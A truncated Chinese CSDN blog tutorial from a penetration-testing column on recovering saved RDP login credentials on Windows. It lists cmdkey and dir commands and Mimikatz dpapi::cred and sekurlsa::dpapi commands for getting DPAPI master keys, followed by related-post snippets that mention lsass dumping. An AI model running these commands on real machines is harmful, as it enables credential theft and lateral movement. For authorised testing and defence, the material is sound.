RDP 总结(二):登录凭据获取

最新推荐文章于 2024-05-15 18:18:40 发布
最新推荐文章于 2024-05-15 18:18:40 发布
阅读量1k 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/119838153
版权
本文介绍了如何在用户通过RDP保存登录凭据后,使用Mimikatz和NetPass工具来获取和解密这些凭据的详细步骤。通过Mimikatz执行特定命令获取guidMasterKey和MasterKey,然后解密指定凭据,同时提到了NirSoft的NetPass工具作为另一种抓取凭据的方法。
摘要由CSDN通过智能技术生成

当用户在RDP登录时点击了保存登录凭据,获取凭据可以使用以下几种方法

查看是否存在RDP凭据

#查看mstsc的连接记录
cmdkey /list

#查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials\*

 

 Mimikatz

存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\administrator.TEST\appdata\local\microsoft\credentials\AFCD2DF5CFF3011965E57ABB0ED64240"

 接着,再执行如下命令,找到guidMasterKey对应的MasterKey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi"

最低0.47元/天 解锁文章
prettyX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RDP登录凭据获取
tomyyyyy
08-27 879
RDP登录凭据获取 当用户在RDP登录时点击了保存登录凭据获取凭据可以使用以下几种方法 #查看mstsc的连接记录 cmdkey /list #查找本地的Credentials dir /a %userprofile%\appdata\local\microsoft\credentials\* Mimikatz 存在的话,使用Mimikatz,执行以下命令,记录guidMasterKey值 ...
[内网]RDP远程桌面密码凭证获取
qq_64787896的博客
03-24 564
根据上面实验找到的路径,将计算机保存的凭据拷贝到Win2012,使用dpapi读取文件。根据guid找到masterkey (可能需要privilege::debug提权)导出lsass.dmp文件,上传到Win2012。实验:读取lsass1.dmp文件。2012R2以上版本都会以密文存放。实验一:找到凭据位置读取。查看当前计算机保存的凭据。其余操作同上一个实验。
获取rdp保存的凭证
weixin_44747030的博客
12-23 1464
获取rdp保存的凭证
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 5651
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
获取主机RDP连接凭据
good good study
02-09 1275
为了避免每次连接服务器都进行身份验证,经常使用RDP的用户可能勾选保存连接凭据,以便进行快速的身份验证。使用找到的Masterkey的值破解指定的凭据文件6A538A1931101CE75C0D949EF75C9CDC,如下成功破解,得到rdp明文。得到的pbData就是凭据的加密数据,guidMasterKey是该凭据的GUID,记录guidMasterKey的值。如下,Credentials目录下保存了一个历史连接凭据,但其中的凭据是加密的。获取rdp加密凭据中的guidMasterKey值。
xrdp:xrdp:开源RDP服务器
01-31
- **易用性**:用户只需知道目标系统的IP地址和登录凭据,就可以像连接Windows远程桌面一样轻松连接到Linux系统。 ### 3. xrdp工作原理 xrdp工作时,会监听指定端口(默认为3389),等待RDP客户端的连接请求。当...
RemoteDesktopControl:C#为.net编写的RemoteDesktopControl
04-30
总结,C#为.NET编写的RemoteDesktopControl项目涉及了RDP协议、.NET框架、用户认证、屏幕捕获、输入同步等多个关键技术点,开发者需要理解这些概念并熟练掌握相关API,才能构建出功能完善、安全可靠的远程桌面控制...
windows远程桌面集中管理RemoteDesktopConnectionManager.rar
01-10
总结,Remote Desktop Connection Manager是Windows用户进行远程桌面管理的强大工具,其丰富的功能和便捷的操作方式使得管理工作变得更加高效。熟练掌握RDCM的使用,能够极大提升IT专业人员的工作效率,降低管理成本...
基于mstsc的高级渗透.pdf
08-23
从mstsc服务端的降级攻击、tscon认证绕过,到客户端的凭证获取和剪切板劫持,再到RDP隧道技术的建立和应用,涵盖了一系列针对远程桌面协议(RDP)的高级攻击手段。这些攻击手段能够使攻击者在不同的操作系统版本中绕过...
某第三支付边界机漏洞导致的内网渗透.pdf
04-08
- **权限获取:** 通过webshell执行命令发现拥有较高权限(可能是administrator或system级别)。 - **内网侦察:** 观察到内网规模较大,利用MS17-010漏洞对内网进行进一步探索。 - **目标选择:** 选择了两台存在MS17-...
RDP密码凭据抓取
最新发布
Y22Lee的博客
05-15 714
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
解决远程桌面6.0登陆时要求的凭据问题
kunchio的专栏
03-09 1924
要变通解决此问题,请关闭远程桌面连接 6.0 中的新功能,以还原为远程桌面连接 5.x 中的功能。为此,请按照下列步骤操作: 单击“开始”,单击“运行”,键入 mstsc.exe,然后单击“确定”。 单击“选项”,然后单击“常规”选项卡。 单击“另存为”,然后在“文件名”框中键入文件名。 选择要将远程桌面文件保存到的位置,单击“保存”,然后单击“取消”。注意:所保存的文件具有
RDP协议详细解析(
qimo601的专栏
03-13 1567
四、各连接模块说明: 1 ISO连接模块: 在客户端与服务器的网络套接口建立之后,需要首先建立RDP协议底层连接,得到连接确认后才能正常通信。具体实现如下: 1) 连接过程说明: 初始连接时,在网络套接口TCP连接建立之后中,客户端首先进行连接请求,当收到连接确认后表示网络连接层连接建立,随后开始传送RDP数据。 2) 连接请求通信数据:   内容 层内数...
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
wangluoanquan111的博客
08-22 417
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
死磕RDP协议,从截图和爆破说起
m0_46699477的博客
04-28 1283
Goby RDP 截图、暴力破解功能升级(兼容性强、检测能力提升、检测效率高) ​​​
详解远程桌面协议, Linux 和 Windows 间的远程桌面互相访问(RDP、VNC协议)
热门推荐
MIss-Y的博客
09-23 2万+
前言:远程协议有很多,本文只讨论几种主要的,另外由于Windows之间的远程桌面工具实在是太多了,这里就不再说明,主要以Windows和Linux之间的互相访问来说明。 一、常见的远程协议及特点 目前常用的协议有VNC/SPICE/RDP三种,就在这里做一个简单的介绍。 三种协议的对比 SPICE VNC RDP BIOS屏幕显示 能 能 不...
RDP远程桌面密码凭证获取
LuckySec
10-19 5593
在渗透过程中获取到一台Windows服务器后,可以尝试获取当前机器保存的RDP远程桌面密码凭证,进而在内网横向渗透中进一步扩大战果。
Windows RDP远程桌面 提示出现身份验证错误 要求的函数不受支持 解决方法
qq_34185638的博客
01-27 2306
Windows RDP远程桌面 提示出现身份验证错误 要求的函数不受支持 解决方法
获取RDP登录凭据
谢公子的博客
07-01 3533
当我们拿到了机器的管理员权限后,想获取RDP凭据保存的密码。那么,该如何操作呢? #查看mstsc的连接纪录 cmdkey /list #查找本地的Credentials: dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* 上传mimikatz,执行以下命令: ...
RDP协议解析:从抓包到理解
"这篇文章是关于RDP协议格式的深度解析,由作者Keary原创,由于微软官方未公开RDP协议的详细文档,作者通过分析多种版本下的抓包数据进行了总结。文档介绍了如何表示协议字段格式,并以实例展示了RDP连接阶段的ISO层...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值